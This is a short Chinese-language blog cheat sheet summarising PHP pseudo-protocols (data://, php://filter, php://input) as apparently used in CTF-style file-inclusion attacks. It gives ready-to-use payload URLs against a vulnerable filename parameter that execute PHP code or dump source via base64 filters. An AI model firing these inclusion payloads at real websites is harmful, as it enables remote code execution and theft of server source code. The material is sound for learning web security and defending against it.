php常见伪协议总结

一键速查

我也不知道我从哪薅来这张表 总之总结的很好就对了.jpg

image-20210729203411342

data://

条件:双 on

用法:

data://text/plain,

data://text/plain;base64,(后面跟的代码是经过base64之后的)

1
2
a.php?filename=data://text/plain,<?php phpinfo();?>
a.php?filename=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

php://

条件:

php://filter

php://input allow_url_include:on

php://filter:在我们需要包含脚本文件,避免脚本被执行,想到拿到源代码的时候使用。

1
a.php?filename=php://filter/read=convert.base64-encode/resource=a.php

php://input:把post数据当做php代码执行,注意:enctype=”multipart/form-data”的时候这个伪协议没用:

1
2
a.php?filename=php://input
POST数据:<?php phpinfo();?>
知识库 > Web > PHP
php常见伪协议总结
https://qiuye.ink/pages/eb590b/
作者
Akiba
发布于
2021年7月23日
许可协议